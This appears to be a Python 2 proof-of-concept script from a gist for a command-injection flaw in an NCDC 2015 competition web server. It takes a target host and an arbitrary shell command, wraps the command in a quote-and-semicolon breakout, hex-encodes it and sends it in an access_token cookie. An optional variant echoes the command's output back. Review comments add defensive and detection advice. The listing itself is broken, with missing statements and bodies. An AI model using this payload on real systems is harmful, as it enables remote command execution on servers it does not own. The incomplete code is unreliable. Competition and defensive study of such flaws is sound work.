Last active Aug 29, 2015
NCDC2015 WWW Command Injection
import sys
import getopt
import urllib2
# define hexEncode function
def hexEncode(x):
    """Return *x* as lowercase hex, at least two digits per character.

    For example "ab" becomes "6162".
    """
    return "".join("%02x" % ord(c) for c in x)
# Entry point of a proof-of-concept for the command-injection flaw named in the
# page title: it prepares one GET to /cgi-bin/show/landing carrying a
# hex-encoded string in the access_token cookie and prints the result.
# NOTE(review): this listing was captured without indentation and with several
# statements missing (the `try:` before getopt, the bodies of the `except` and
# help branches, and the right-hand sides of `response =` / `content =`), so it
# does not parse as shown. Python 2 only (urllib2, raw_input, print statements).
def main(argv):
# set defaults
target = None
# parse command line options
opts, args = getopt.getopt(argv, "h", ["help", "target="])
except getopt.GetoptError:
for opt, arg in opts:
if opt in ("-h", "--help"):
# NOTE(review): ("--target") is a plain string, not a one-element tuple, so
# this is a substring test rather than tuple membership.
elif opt in ("--target"):
target = arg
if target is None:
# No --target option was given: ask for the host interactively.
target = raw_input("Enter target (hostname or IP): ")
# The URL is plain HTTP and the target string is concatenated without validation.
url = "http://" + target + "/cgi-bin/show/landing"
command = raw_input("Enter command to inject: ")
# The input is wrapped as "' .; <command>;'" and hex-encoded before it goes
# into the cookie. Presumably the CGI handler hex-decodes access_token and
# splices it into a single-quoted shell command - confirm against the server
# code. Defensive takeaways: treat the token as opaque data (strict format and
# length check, lookup in a session store), never hand it to a shell, and
# invoke helpers with an argument vector instead of a command string.
# Detection: access_token values whose hex decoding contains a quote or a
# semicolon do not look like tokens and are worth alerting on.
encodedCommand = hexEncode("' .; " + command + ";'")
# uncomment the hacky line below if you want stderr output in the response
# (that variant redirects output to /tmp/a on the server, so a stray /tmp/a
# file is a possible host artifact for responders)
#encodedCommand = hexEncode("' .; " + command + "&> /tmp/a; cat /tmp/a;'")
opener = urllib2.build_opener()
# Attach the encoded value as the access_token cookie for requests made
# through this opener.
opener.addheaders.append(('Cookie', 'access_token=' + encodedCommand))
# NOTE(review): the right-hand sides of the next two assignments are missing
# from the captured listing.
response =
content =
# Echo the request line and cookie header, then whatever `content` holds.
print "-----------------------------------------------------"
print "GET " + url
print "Cookie: access_token=" + encodedCommand
print "-----------------------------------------------------"
print content
def usage():
    """Print the command-line help text to stdout."""
    help_lines = (
        "Usage: [options] ...",
        "Configuration:",
        " --target=<hostname or IP> Sets the target host.",
        "Miscellaneous:",
        " -h Print usage options.",
        "\n",
    )
    for help_line in help_lines:
        print help_line
# NOTE(review): the body of this guard is missing from the listing as captured;
# presumably it invoked main() with the command-line arguments - confirm
# against the original gist.
if __name__ == "__main__":